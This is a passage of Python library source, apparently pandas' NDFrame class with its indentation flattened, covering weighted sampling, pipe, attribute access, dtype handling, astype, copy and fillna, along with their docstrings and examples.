# Check weights for compliance
if weights is not None:
# If a series, align with frame
if isinstance(weights, pd.Series):
weights = weights.reindex(self.axes[axis])
# Strings acceptable if a dataframe and axis = 0
if isinstance(weights, string_types):
if isinstance(self, pd.DataFrame):
if axis == 0:
try:
weights = self[weights]
except KeyError:
raise KeyError("String passed to weights not a "
"valid column")
else:
raise ValueError("Strings can only be passed to "
"weights when sampling from rows on "
"a DataFrame")
else:
raise ValueError("Strings cannot be passed as weights "
"when sampling from a Series or Panel.")
weights = pd.Series(weights, dtype='float64')
if len(weights) != axis_length:
raise ValueError("Weights and axis to be sampled must be of "
"same length")
if (weights == np.inf).any() or (weights == -np.inf).any():
raise ValueError("weight vector may not include `inf` values")
if (weights < 0).any():
raise ValueError("weight vector many not include negative "
"values")
# If has nan, set to zero.
weights = weights.fillna(0)
# Renormalize if don't sum to 1
if weights.sum() != 1:
if weights.sum() != 0:
weights = weights / weights.sum()
else:
raise ValueError("Invalid weights: weights sum to zero")
weights = weights.values
# If no frac or n, default to n=1.
if n is None and frac is None:
n = 1
elif n is not None and frac is None and n % 1 != 0:
raise ValueError("Only integers accepted as `n` values")
elif n is None and frac is not None:
n = int(round(frac * axis_length))
elif n is not None and frac is not None:
raise ValueError('Please enter a value for `frac` OR `n`, not '
'both')
# Check for negative sizes
if n < 0:
raise ValueError("A negative number of rows requested. Please "
"provide positive value.")
locs = rs.choice(axis_length, size=n, replace=replace, p=weights)
return self.take(locs, axis=axis, is_copy=False)
_shared_docs['pipe'] = (r"""
Apply func(self, \*args, \*\*kwargs)
Parameters
----------
func : function
function to apply to the %(klass)s.
``args``, and ``kwargs`` are passed into ``func``.
Alternatively a ``(callable, data_keyword)`` tuple where
``data_keyword`` is a string indicating the keyword of
``callable`` that expects the %(klass)s.
args : iterable, optional
positional arguments passed into ``func``.
kwargs : mapping, optional
a dictionary of keyword arguments passed into ``func``.
Returns
-------
object : the return type of ``func``.
Notes
-----
Use ``.pipe`` when chaining together functions that expect
Series, DataFrames or GroupBy objects. Instead of writing
>>> f(g(h(df), arg1=a), arg2=b, arg3=c)
You can write
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe(f, arg2=b, arg3=c)
... )
If you have a function that takes the data as (say) the second
argument, pass a tuple indicating which keyword expects the
data. For example, suppose ``f`` takes its data as ``arg2``:
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe((f, 'arg2'), arg1=a, arg3=c)
... )
See Also
--------
pandas.DataFrame.apply
pandas.DataFrame.applymap
pandas.Series.map
""")
@Appender(_shared_docs['pipe'] % _shared_doc_kwargs)
def pipe(self, func, *args, **kwargs):
return com._pipe(self, func, *args, **kwargs)
_shared_docs['aggregate'] = ("""
Aggregate using one or more operations over the specified axis.
%(versionadded)s
Parameters
----------
func : function, string, dictionary, or list of string/functions
Function to use for aggregating the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply. For
a DataFrame, can pass a dict, if the keys are DataFrame column names.
Accepted combinations are:
- string function name.
- function.
- list of functions.
- dict of column names -> functions (or list of functions).
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
aggregated : %(klass)s
Notes
-----
`agg` is an alias for `aggregate`. Use the alias.
""")
_shared_docs['transform'] = ("""
Call function producing a like-indexed %(klass)s
and return a %(klass)s with the transformed values
.. versionadded:: 0.20.0
Parameters
----------
func : callable, string, dictionary, or list of string/callables
To apply to column
Accepted Combinations are:
- string function name
- function
- list of functions
- dict of column names -> functions (or list of functions)
Returns
-------
transformed : %(klass)s
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'],
... index=pd.date_range('1/1/2000', periods=10))
df.iloc[3:7] = np.nan
>>> df.transform(lambda x: (x - x.mean()) / x.std())
A B C
2000-01-01 0.579457 1.236184 0.123424
2000-01-02 0.370357 -0.605875 -1.231325
2000-01-03 1.455756 -0.277446 0.288967
2000-01-04 NaN NaN NaN
2000-01-05 NaN NaN NaN
2000-01-06 NaN NaN NaN
2000-01-07 NaN NaN NaN
2000-01-08 -0.498658 1.274522 1.642524
2000-01-09 -0.540524 -1.012676 -0.828968
2000-01-10 -1.366388 -0.614710 0.005378
See also
--------
pandas.%(klass)s.aggregate
pandas.%(klass)s.apply
""")
# ----------------------------------------------------------------------
# Attribute access
def __finalize__(self, other, method=None, **kwargs):
"""
Propagate metadata from other to self.
Parameters
----------
other : the object from which to get the attributes that we are going
to propagate
method : optional, a passed method name ; possibly to take different
types of propagation actions based on this
"""
if isinstance(other, NDFrame):
for name in self._metadata:
object.__setattr__(self, name, getattr(other, name, None))
return self
def __getattr__(self, name):
"""After regular attribute access, try looking up the name
This allows simpler access to columns for interactive use.
"""
# Note: obj.x will always call obj.__getattribute__('x') prior to
# calling obj.__getattr__('x').
if (name in self._internal_names_set or name in self._metadata or
name in self._accessors):
return object.__getattribute__(self, name)
else:
if name in self._info_axis:
return self[name]
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
"""After regular attribute access, try setting the name
This allows simpler access to columns for interactive use.
"""
# first try regular attribute access via __getattribute__, so that
# e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify
# the same attribute.
try:
object.__getattribute__(self, name)
return object.__setattr__(self, name, value)
except AttributeError:
pass
# if this fails, go on to more involved attribute setting
# (note that this matches __getattr__, above).
if name in self._internal_names_set:
object.__setattr__(self, name, value)
elif name in self._metadata:
object.__setattr__(self, name, value)
else:
try:
existing = getattr(self, name)
if isinstance(existing, Index):
object.__setattr__(self, name, value)
elif name in self._info_axis:
self[name] = value
else:
object.__setattr__(self, name, value)
except (AttributeError, TypeError):
if isinstance(self, ABCDataFrame) and (is_list_like(value)):
warnings.warn("Pandas doesn't allow columns to be "
"created via a new attribute name - see "
"https://pandas.pydata.org/pandas-docs/"
"stable/indexing.html#attribute-access",
stacklevel=2)
object.__setattr__(self, name, value)
# ----------------------------------------------------------------------
# Getting and setting elements
# ----------------------------------------------------------------------
# Consolidation of internals
def _protect_consolidate(self, f):
"""Consolidate _data -- if the blocks have changed, then clear the
cache
"""
blocks_before = len(self._data.blocks)
result = f()
if len(self._data.blocks) != blocks_before:
self._clear_item_cache()
return result
def _consolidate_inplace(self):
"""Consolidate data in place and return None"""
def f():
self._data = self._data.consolidate()
self._protect_consolidate(f)
def _consolidate(self, inplace=False):
"""
Compute NDFrame with "consolidated" internals (data of each dtype
grouped together in a single ndarray).
Parameters
----------
inplace : boolean, default False
If False return new object, otherwise modify existing object
Returns
-------
consolidated : type of caller
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if inplace:
self._consolidate_inplace()
else:
f = lambda: self._data.consolidate()
cons_data = self._protect_consolidate(f)
return self._constructor(cons_data).__finalize__(self)
def consolidate(self, inplace=False):
"""Compute NDFrame with "consolidated" internals (data of each dtype
grouped together in a single ndarray).
.. deprecated:: 0.20.0
Consolidate will be an internal implementation only.
"""
# 15483
warnings.warn("consolidate is deprecated and will be removed in a "
"future release.", FutureWarning, stacklevel=2)
return self._consolidate(inplace)
@property
def _is_mixed_type(self):
f = lambda: self._data.is_mixed_type
return self._protect_consolidate(f)
@property
def _is_numeric_mixed_type(self):
f = lambda: self._data.is_numeric_mixed_type
return self._protect_consolidate(f)
@property
def _is_datelike_mixed_type(self):
f = lambda: self._data.is_datelike_mixed_type
return self._protect_consolidate(f)
def _check_inplace_setting(self, value):
""" check whether we allow in-place setting with this type of value """
if self._is_mixed_type:
if not self._is_numeric_mixed_type:
# allow an actual np.nan thru
try:
if np.isnan(value):
return True
except Exception:
pass
raise TypeError('Cannot do inplace boolean setting on '
'mixed-types with a non np.nan value')
return True
def _get_numeric_data(self):
return self._constructor(
self._data.get_numeric_data()).__finalize__(self)
def _get_bool_data(self):
return self._constructor(self._data.get_bool_data()).__finalize__(self)
# ----------------------------------------------------------------------
# Internal Interface Methods
def as_matrix(self, columns=None):
"""Convert the frame to its Numpy-array representation.
.. deprecated:: 0.23.0
Use :meth:`DataFrame.values` instead.
Parameters
----------
columns: list, optional, default:None
If None, return all columns, otherwise, returns specified columns.
Returns
-------
values : ndarray
If the caller is heterogeneous and contains booleans or objects,
the result will be of dtype=object. See Notes.
Notes
-----
Return is NOT a Numpy-matrix, rather, a Numpy-array.
The dtype will be a lower-common-denominator dtype (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen. Use this
with care if you are not dealing with the blocks.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. If dtypes are int32 and uint8, dtype will be upcase to
int32. By numpy.find_common_type convention, mixing int64 and uint64
will result in a flot64 dtype.
This method is provided for backwards compatibility. Generally,
it is recommended to use '.values'.
See Also
--------
pandas.DataFrame.values
"""
warnings.warn("Method .as_matrix will be removed in a future version. "
"Use .values instead.", FutureWarning, stacklevel=2)
self._consolidate_inplace()
return self._data.as_array(transpose=self._AXIS_REVERSED,
items=columns)
@property
def values(self):
"""
Return a Numpy representation of the DataFrame.
Only the values in the DataFrame will be returned, the axes labels
will be removed.
Returns
-------
numpy.ndarray
The values of the DataFrame.
Examples
--------
A DataFrame where all columns are the same type (e.g., int64) results
in an array of the same type.
>>> df = pd.DataFrame({'age': [ 3, 29],
... 'height': [94, 170],
... 'weight': [31, 115]})
>>> df
age height weight
0 3 94 31
1 29 170 115
>>> df.dtypes
age int64
height int64
weight int64
dtype: object
>>> df.values
array([[ 3, 94, 31],
[ 29, 170, 115]], dtype=int64)
A DataFrame with mixed type columns(e.g., str/object, int64, float32)
results in an ndarray of the broadest type that accommodates these
mixed types (e.g., object).
>>> df2 = pd.DataFrame([('parrot', 24.0, 'second'),
... ('lion', 80.5, 1),
... ('monkey', np.nan, None)],
... columns=('name', 'max_speed', 'rank'))
>>> df2.dtypes
name object
max_speed float64
rank object
dtype: object
>>> df2.values
array([['parrot', 24.0, 'second'],
['lion', 80.5, 1],
['monkey', nan, None]], dtype=object)
Notes
-----
The dtype will be a lower-common-denominator dtype (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen. Use this
with care if you are not dealing with the blocks.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. If dtypes are int32 and uint8, dtype will be upcast to
int32. By :func:`numpy.find_common_type` convention, mixing int64
and uint64 will result in a float64 dtype.
See Also
--------
pandas.DataFrame.index : Retrievie the index labels
pandas.DataFrame.columns : Retrieving the column names
"""
self._consolidate_inplace()
return self._data.as_array(transpose=self._AXIS_REVERSED)
@property
def _values(self):
"""internal implementation"""
return self.values
@property
def _get_values(self):
# compat
return self.values
def get_values(self):
"""
Return an ndarray after converting sparse values to dense.
This is the same as ``.values`` for non-sparse data. For sparse
data contained in a `pandas.SparseArray`, the data are first
converted to a dense representation.
Returns
-------
numpy.ndarray
Numpy representation of DataFrame
See Also
--------
values : Numpy representation of DataFrame.
pandas.SparseArray : Container for sparse data.
Examples
--------
>>> df = pd.DataFrame({'a': [1, 2], 'b': [True, False],
... 'c': [1.0, 2.0]})
>>> df
a b c
0 1 True 1.0
1 2 False 2.0
>>> df.get_values()
array([[1, True, 1.0], [2, False, 2.0]], dtype=object)
>>> df = pd.DataFrame({"a": pd.SparseArray([1, None, None]),
... "c": [1.0, 2.0, 3.0]})
>>> df
a c
0 1.0 1.0
1 NaN 2.0
2 NaN 3.0
>>> df.get_values()
array([[ 1., 1.],
[nan, 2.],
[nan, 3.]])
"""
return self.values
def get_dtype_counts(self):
"""
Return counts of unique dtypes in this object.
Returns
-------
dtype : Series
Series with the count of columns with each dtype.
See Also
--------
dtypes : Return the dtypes in this object.
Examples
--------
>>> a = [['a', 1, 1.0], ['b', 2, 2.0], ['c', 3, 3.0]]
>>> df = pd.DataFrame(a, columns=['str', 'int', 'float'])
>>> df
str int float
0 a 1 1.0
1 b 2 2.0
2 c 3 3.0
>>> df.get_dtype_counts()
float64 1
int64 1
object 1
dtype: int64
"""
from pandas import Series
return Series(self._data.get_dtype_counts())
def get_ftype_counts(self):
"""
Return counts of unique ftypes in this object.
.. deprecated:: 0.23.0
This is useful for SparseDataFrame or for DataFrames containing
sparse arrays.
Returns
-------
dtype : Series
Series with the count of columns with each type and
sparsity (dense/sparse)
See Also
--------
ftypes : Return ftypes (indication of sparse/dense and dtype) in
this object.
Examples
--------
>>> a = [['a', 1, 1.0], ['b', 2, 2.0], ['c', 3, 3.0]]
>>> df = pd.DataFrame(a, columns=['str', 'int', 'float'])
>>> df
str int float
0 a 1 1.0
1 b 2 2.0
2 c 3 3.0
>>> df.get_ftype_counts()
float64:dense 1
int64:dense 1
object:dense 1
dtype: int64
"""
warnings.warn("get_ftype_counts is deprecated and will "
"be removed in a future version",
FutureWarning, stacklevel=2)
from pandas import Series
return Series(self._data.get_ftype_counts())
@property
def dtypes(self):
"""
Return the dtypes in the DataFrame.
This returns a Series with the data type of each column.
The result's index is the original DataFrame's columns. Columns
with mixed types are stored with the ``object`` dtype. See
:ref:`the User Guide <basics.dtypes>` for more.
Returns
-------
pandas.Series
The data type of each column.
See Also
--------
pandas.DataFrame.ftypes : dtype and sparsity information.
Examples
--------
>>> df = pd.DataFrame({'float': [1.0],
... 'int': [1],
... 'datetime': [pd.Timestamp('20180310')],
... 'string': ['foo']})
>>> df.dtypes
float float64
int int64
datetime datetime64[ns]
string object
dtype: object
"""
from pandas import Series
return Series(self._data.get_dtypes(), index=self._info_axis,
dtype=np.object_)
@property
def ftypes(self):
"""
Return the ftypes (indication of sparse/dense and dtype) in DataFrame.
This returns a Series with the data type of each column.
The result's index is the original DataFrame's columns. Columns
with mixed types are stored with the ``object`` dtype. See
:ref:`the User Guide <basics.dtypes>` for more.
Returns
-------
pandas.Series
The data type and indication of sparse/dense of each column.
See Also
--------
pandas.DataFrame.dtypes: Series with just dtype information.
pandas.SparseDataFrame : Container for sparse tabular data.
Notes
-----
Sparse data should have the same dtypes as its dense representation.
Examples
--------
>>> import numpy as np
>>> arr = np.random.RandomState(0).randn(100, 4)
>>> arr[arr < .8] = np.nan
>>> pd.DataFrame(arr).ftypes
0 float64:dense
1 float64:dense
2 float64:dense
3 float64:dense
dtype: object
>>> pd.SparseDataFrame(arr).ftypes
0 float64:sparse
1 float64:sparse
2 float64:sparse
3 float64:sparse
dtype: object
"""
from pandas import Series
return Series(self._data.get_ftypes(), index=self._info_axis,
dtype=np.object_)
def as_blocks(self, copy=True):
"""
Convert the frame to a dict of dtype -> Constructor Types that each has
a homogeneous dtype.
.. deprecated:: 0.21.0
NOTE: the dtypes of the blocks WILL BE PRESERVED HERE (unlike in
as_matrix)
Parameters
----------
copy : boolean, default True
Returns
-------
values : a dict of dtype -> Constructor Types
"""
warnings.warn("as_blocks is deprecated and will "
"be removed in a future version",
FutureWarning, stacklevel=2)
return self._to_dict_of_blocks(copy=copy)
@property
def blocks(self):
"""
Internal property, property synonym for as_blocks()
.. deprecated:: 0.21.0
"""
return self.as_blocks()
def _to_dict_of_blocks(self, copy=True):
"""
Return a dict of dtype -> Constructor Types that
each is a homogeneous dtype.
Internal ONLY
"""
return {k: self._constructor(v).__finalize__(self)
for k, v, in self._data.to_dict(copy=copy).items()}
@deprecate_kwarg(old_arg_name='raise_on_error', new_arg_name='errors',
mapping={True: 'raise', False: 'ignore'})
def astype(self, dtype, copy=True, errors='raise', **kwargs):
"""
Cast a pandas object to a specified dtype ``dtype``.
Parameters
----------
dtype : data type, or dict of column name -> data type
Use a numpy.dtype or Python type to cast entire pandas object to
the same type. Alternatively, use {col: dtype, ...}, where col is a
column label and dtype is a numpy.dtype or Python type to cast one
or more of the DataFrame's columns to column-specific types.
copy : bool, default True.
Return a copy when ``copy=True`` (be very careful setting
``copy=False`` as changes to values then may propagate to other
pandas objects).
errors : {'raise', 'ignore'}, default 'raise'.
Control raising of exceptions on invalid data for provided dtype.
- ``raise`` : allow exceptions to be raised
- ``ignore`` : suppress exceptions. On error return original object
.. versionadded:: 0.20.0
raise_on_error : raise on invalid input
.. deprecated:: 0.20.0
Use ``errors`` instead
kwargs : keyword arguments to pass on to the constructor
Returns
-------
casted : type of caller
Examples
--------
>>> ser = pd.Series([1, 2], dtype='int32')
>>> ser
0 1
1 2
dtype: int32
>>> ser.astype('int64')
0 1
1 2
dtype: int64
Convert to categorical type:
>>> ser.astype('category')
0 1
1 2
dtype: category
Categories (2, int64): [1, 2]
Convert to ordered categorical type with custom ordering:
>>> ser.astype('category', ordered=True, categories=[2, 1])
0 1
1 2
dtype: category
Categories (2, int64): [2 < 1]
Note that using ``copy=False`` and changing data on a new
pandas object may propagate changes:
>>> s1 = pd.Series([1,2])
>>> s2 = s1.astype('int64', copy=False)
>>> s2[0] = 10
>>> s1 # note that s1[0] has changed too
0 10
1 2
dtype: int64
See also
--------
pandas.to_datetime : Convert argument to datetime.
pandas.to_timedelta : Convert argument to timedelta.
pandas.to_numeric : Convert argument to a numeric type.
numpy.ndarray.astype : Cast a numpy array to a specified type.
"""
if is_dict_like(dtype):
if self.ndim == 1: # i.e. Series
if len(dtype) > 1 or self.name not in dtype:
raise KeyError('Only the Series name can be used for '
'the key in Series dtype mappings.')
new_type = dtype[self.name]
return self.astype(new_type, copy, errors, **kwargs)
elif self.ndim > 2:
raise NotImplementedError(
'astype() only accepts a dtype arg of type dict when '
'invoked on Series and DataFrames. A single dtype must be '
'specified when invoked on a Panel.'
)
for col_name in dtype.keys():
if col_name not in self:
raise KeyError('Only a column name can be used for the '
'key in a dtype mappings argument.')
results = []
for col_name, col in self.iteritems():
if col_name in dtype:
results.append(col.astype(dtype[col_name], copy=copy))
else:
results.append(results.append(col.copy() if copy else col))
elif is_categorical_dtype(dtype) and self.ndim > 1:
# GH 18099: columnwise conversion to categorical
results = (self[col].astype(dtype, copy=copy) for col in self)
else:
# else, only a single dtype is given
new_data = self._data.astype(dtype=dtype, copy=copy, errors=errors,
**kwargs)
return self._constructor(new_data).__finalize__(self)
# GH 19920: retain column metadata after concat
result = pd.concat(results, axis=1, copy=False)
result.columns = self.columns
return result
def copy(self, deep=True):
"""
Make a copy of this object's indices and data.
When ``deep=True`` (default), a new object will be created with a
copy of the calling object's data and indices. Modifications to
the data or indices of the copy will not be reflected in the
original object (see notes below).
When ``deep=False``, a new object will be created without copying
the calling object's data or index (only references to the data
and index are copied). Any changes to the data of the original
will be reflected in the shallow copy (and vice versa).
Parameters
----------
deep : bool, default True
Make a deep copy, including a copy of the data and the indices.
With ``deep=False`` neither the indices nor the data are copied.
Returns
-------
copy : Series, DataFrame or Panel
Object type matches caller.
Notes
-----
When ``deep=True``, data is copied but actual Python objects
will not be copied recursively, only the reference to the object.
This is in contrast to `copy.deepcopy` in the Standard Library,
which recursively copies object data (see examples below).
While ``Index`` objects are copied when ``deep=True``, the underlying
numpy array is not copied for performance reasons. Since ``Index`` is
immutable, the underlying data can be safely shared and a copy
is not needed.
Examples
--------
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> s
a 1
b 2
dtype: int64
>>> s_copy = s.copy()
>>> s_copy
a 1
b 2
dtype: int64
**Shallow copy versus default (deep) copy:**
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> deep = s.copy()
>>> shallow = s.copy(deep=False)
Shallow copy shares data and index with original.
>>> s is shallow
False
>>> s.values is shallow.values and s.index is shallow.index
True
Deep copy has own copy of data and index.
>>> s is deep
False
>>> s.values is deep.values or s.index is deep.index
False
Updates to the data shared by shallow copy and original is reflected
in both; deep copy remains unchanged.
>>> s[0] = 3
>>> shallow[1] = 4
>>> s
a 3
b 4
dtype: int64
>>> shallow
a 3
b 4
dtype: int64
>>> deep
a 1
b 2
dtype: int64
Note that when copying an object containing Python objects, a deep copy
will copy the data, but will not do so recursively. Updating a nested
data object will be reflected in the deep copy.
>>> s = pd.Series([[1, 2], [3, 4]])
>>> deep = s.copy()
>>> s[0][0] = 10
>>> s
0 [10, 2]
1 [3, 4]
dtype: object
>>> deep
0 [10, 2]
1 [3, 4]
dtype: object
"""
data = self._data.copy(deep=deep)
return self._constructor(data).__finalize__(self)
def __copy__(self, deep=True):
return self.copy(deep=deep)
def __deepcopy__(self, memo=None):
if memo is None:
memo = {}
return self.copy(deep=True)
def _convert(self, datetime=False, numeric=False, timedelta=False,
coerce=False, copy=True):
"""
Attempt to infer better dtype for object columns
Parameters
----------
datetime : boolean, default False
If True, convert to date where possible.
numeric : boolean, default False
If True, attempt to convert to numbers (including strings), with
unconvertible values becoming NaN.
timedelta : boolean, default False
If True, convert to timedelta where possible.
coerce : boolean, default False
If True, force conversion with unconvertible values converted to
nulls (NaN or NaT)
copy : boolean, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
Returns
-------
converted : same as input object
"""
return self._constructor(
self._data.convert(datetime=datetime, numeric=numeric,
timedelta=timedelta, coerce=coerce,
copy=copy)).__finalize__(self)
def convert_objects(self, convert_dates=True, convert_numeric=False,
convert_timedeltas=True, copy=True):
"""Attempt to infer better dtype for object columns.
.. deprecated:: 0.21.0
Parameters
----------
convert_dates : boolean, default True
If True, convert to date where possible. If 'coerce', force
conversion, with unconvertible values becoming NaT.
convert_numeric : boolean, default False
If True, attempt to coerce to numbers (including strings), with
unconvertible values becoming NaN.
convert_timedeltas : boolean, default True
If True, convert to timedelta where possible. If 'coerce', force
conversion, with unconvertible values becoming NaT.
copy : boolean, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
See Also
--------
pandas.to_datetime : Convert argument to datetime.
pandas.to_timedelta : Convert argument to timedelta.
pandas.to_numeric : Return a fixed frequency timedelta index,
with day as the default.
Returns
-------
converted : same as input object
"""
msg = ("convert_objects is deprecated. To re-infer data dtypes for "
"object columns, use {klass}.infer_objects()\nFor all "
"other conversions use the data-type specific converters "
"pd.to_datetime, pd.to_timedelta and pd.to_numeric."
).format(klass=self.__class__.__name__)
warnings.warn(msg, FutureWarning, stacklevel=2)
return self._constructor(
self._data.convert(convert_dates=convert_dates,
convert_numeric=convert_numeric,
convert_timedeltas=convert_timedeltas,
copy=copy)).__finalize__(self)
def infer_objects(self):
"""
Attempt to infer better dtypes for object columns.
Attempts soft conversion of object-dtyped
columns, leaving non-object and unconvertible
columns unchanged. The inference rules are the
same as during normal Series/DataFrame construction.
.. versionadded:: 0.21.0
See Also
--------
pandas.to_datetime : Convert argument to datetime.
pandas.to_timedelta : Convert argument to timedelta.
pandas.to_numeric : Convert argument to numeric typeR
Returns
-------
converted : same type as input object
Examples
--------
>>> df = pd.DataFrame({"A": ["a", 1, 2, 3]})
>>> df = df.iloc[1:]
>>> df
A
1 1
2 2
3 3
>>> df.dtypes
A object
dtype: object
>>> df.infer_objects().dtypes
A int64
dtype: object
"""
# numeric=False necessary to only soft convert;
# python objects will still be converted to
# native numpy numeric types
return self._constructor(
self._data.convert(datetime=True, numeric=False,
timedelta=True, coerce=False,
copy=True)).__finalize__(self)
# ----------------------------------------------------------------------
# Filling NA's
_shared_docs['fillna'] = ("""
Fill NA/NaN values using the specified method
Parameters
----------
value : scalar, dict, Series, or DataFrame
Value to use to fill holes (e.g. 0), alternately a
dict/Series/DataFrame of values specifying which value to use for
each index (for a Series) or column (for a DataFrame). (values not
in the dict/Series/DataFrame will not be filled). This value cannot
be a list.
method : {'backfill', 'bfill', 'pad', 'ffill', None}, default None
Method to use for filling holes in reindexed Series
pad / ffill: propagate last valid observation forward to next valid
backfill / bfill: use NEXT valid observation to fill gap
axis : %(axes_single_arg)s
inplace : boolean, default False
If True, fill in place. Note: this will modify any
other views on this object, (e.g. a no-copy slice for a column in a
DataFrame).
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
downcast : dict, default is None
a dict of item->dtype of what to downcast if possible,
or the string 'infer' which will try to downcast to an appropriate
equal type (e.g. float64 to int64 if possible)
See Also
--------
reindex, asfreq
Returns
-------
filled : %(klass)s
Examples
--------
>>> df = pd.DataFrame([[np.nan, 2, np.nan, 0],
... [3, 4, np.nan, 1],
... [np.nan, np.nan, np.nan, 5],
... [np.nan, 3, np.nan, 4]],
... columns=list('ABCD'))
>>> df
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
3 NaN 3.0 NaN 4
Replace all NaN elements with 0s.
>>> df.fillna(0)
A B C D
0 0.0 2.0 0.0 0
1 3.0 4.0 0.0 1
2 0.0 0.0 0.0 5
3 0.0 3.0 0.0 4
We can also propagate non-null values forward or backward.
>>> df.fillna(method='ffill')
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 3.0 4.0 NaN 5
3 3.0 3.0 NaN 4
Replace all NaN elements in column 'A', 'B', 'C', and 'D', with 0, 1,
2, and 3 respectively.
>>> values = {'A': 0, 'B': 1, 'C': 2, 'D': 3}
>>> df.fillna(value=values)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 2.0 1
2 0.0 1.0 2.0 5
3 0.0 3.0 2.0 4
Only replace the first NaN element.
>>> df.fillna(value=values, limit=1)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 NaN 1
2 NaN 1.0 NaN 5
3 NaN 3.0 NaN 4
""")
@Appender(_shared_docs['fillna'] % _shared_doc_kwargs)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None):
inplace = validate_bool_kwarg(inplace, 'inplace')
value, method = validate_fillna_kwargs(value, method)
self._consolidate_inplace()
# set the default here, so functions examining the signaure
# can detect if something was set (e.g. in groupby) (GH9221)
if axis is None:
axis = 0
axis = self._get_axis_number(axis)
from pandas import DataFrame
if value is None:
if self._is_mixed_type and axis == 1:
if inplace:
raise NotImplementedError()
result = self.T.fillna(method=method, limit=limit).T
# need to downcast here because of all of the transposes
result._data = result._data.downcast()
return result
# > 3d
if self.ndim > 3:
raise NotImplementedError('Cannot fillna with a method for > '
'3dims')
# 3d
elif self.ndim == 3:
# fill in 2d chunks
result = {col: s.fillna(method=method, value=value)
for col, s in self.iteritems()}
new_obj = self._constructor.\
from_dict(result).__finalize__(self)
new_data = new_obj._data
else:
# 2d or less
new_data = self._data.interpolate(method=method, axis=axis,
limit=limit, inplace=inplace,
coerce=True,
downcast=downcast)
else:
if len(self._get_axis(axis)) == 0:
return self
if self.ndim == 1:
if isinstance(value, (dict, ABCSeries)):
from pandas import Series
value = Series(value)
elif not is_list_like(value):
pass
else:
raise TypeError('"value" parameter must be a scalar, dict '
'or Series, but you passed a '
'"{0}"'.format(type(value).__name__))
new_data = self._data.fillna(value=value, limit=limit,
inplace=inplace,
downcast=downcast)
elif isinstance(value, (dict, ABCSeries)):
if axis == 1:
raise NotImplementedError('Currently only can fill '
'with dict/Series column '
'by column')
result = self if inplace else self.copy()
for k, v in compat.iteritems(value):
if k not in result:
continue
obj = result[k]
obj.fillna(v, limit=limit, inplace=True, downcast=downcast)
return result if not inplace else None
elif not is_list_like(value):
new_data = self._data.fillna(value=value, limit=limit,
inplace=inplace,
downcast=downcast)
elif isinstance(value, DataFrame) and self.ndim == 2:
new_data = self.where(self.notna(), value)
else:
raise ValueError("invalid fill value with a %s" % type(value))
if inplace:
self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
def ffill(self, axis=None, inplace=False, limit=None, downcast=None):
"""
Synonym for :meth:`DataFrame.fillna(method='ffill') <DataFrame.fillna>`
"""
return self.fillna(method='ffill', axis=axis, inplace=inplace,
limit=limit, downcast=downcast)
def bfill(self, axis=None, inplace=False, limit=None, downcast=None):
"""
Synonym for :meth:`DataFrame.fillna(method='bfill') <DataFrame.fillna>`
"""
return self.fillna(method='bfill', axis=axis, inplace=inplace,
limit=limit, downcast=downcast)
_shared_docs['replace'] = ("""
Replace values given in 'to_replace' with 'value'.
Parameters
----------
to_replace : str, regex, list, dict, Series, numeric, or None
* numeric, str or regex:
- numeric: numeric values equal to ``to_replace`` will be
replaced with ``value``
- str: string exactly matching ``to_replace`` will be replaced
with ``value``
- regex: regexs matching ``to_replace`` will be replaced with
``value``
* list of str, regex, or numeric:
- First, if ``to_replace`` and ``value`` are both lists, they
**must** be the same length.
- Second, if ``regex=True`` then all of the strings in **both**
lists will be interpreted as regexs otherwise they will match
directly. This doesn't matter much for ``value`` since there
are only a few possible substitution regexes you can use.
- str, regex and numeric rules apply as above.
* dict:
- Dicts can be used to specify different replacement values
for different existing values. For example,
{'a': 'b', 'y': 'z'} replaces the value 'a' with 'b' and
'y' with 'z'. To use a dict in this way the ``value``
parameter should be ``None``.
- For a DataFrame a dict can specify that different values
should be replaced in different columns. For example,
{'a': 1, 'b': 'z'} looks for the value 1 in column 'a' and
the value 'z' in column 'b' and replaces these values with
whatever is specified in ``value``. The ``value`` parameter
should not be ``None`` in this case. You can treat this as a
special case of passing two lists except that you are
specifying the column to search in.
- For a DataFrame nested dictionaries, e.g.,
{'a': {'b': np.nan}}, are read as follows: look in column 'a'
for the value 'b' and replace it with NaN. The ``value``
parameter should be ``None`` to use a nested dict in this
way. You can nest regular expressions as well. Note that
column names (the top-level dictionary keys in a nested
dictionary) **cannot** be regular expressions.
* None:
- This means that the ``regex`` argument must be a string,
compiled regular expression, or list, dict, ndarray or Series
of such elements. If ``value`` is also ``None`` then this
**must** be a nested dictionary or ``Series``.
See the examples section for examples of each of these.
value : scalar, dict, list, str, regex, default None
Value to replace any values matching ``to_replace`` with.
For a DataFrame a dict of values can be used to specify which
value to use for each column (columns not in the dict will not be
filled). Regular expressions, strings and lists or dicts of such
objects are also allowed.
inplace : boolean, default False
If True, in place. Note: this will modify any
